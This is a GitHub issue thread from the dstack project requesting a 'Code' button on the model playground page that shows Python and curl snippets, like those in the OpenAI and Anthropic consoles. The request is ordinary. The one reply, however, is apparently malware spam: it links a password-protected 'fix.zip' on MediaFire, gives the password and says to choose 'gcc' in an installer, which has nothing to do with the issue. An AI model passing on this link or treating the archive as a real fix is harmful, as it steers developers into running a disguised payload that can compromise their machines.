### ISSUE TITLE
[UI] Add a `Code` button to the model playground page (similar to OpenAI/Anthropic)

### ISSUE THREAD

**Issue by peterschmidt85** [dstackai/dstack#1639]
There should be a way to see the `Python` and `curl` snippets.

**Examples:**

OpenAI:

![2024-08-29 08 50 54](https://github.com/user-attachments/assets/9596b9dc-6513-4ce9-a4a5-932becf937c4)

Anthropic:

![2024-08-29 09 09 57](https://github.com/user-attachments/assets/3c980b91-bf74-4dbd-b37c-8497099dc515)

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
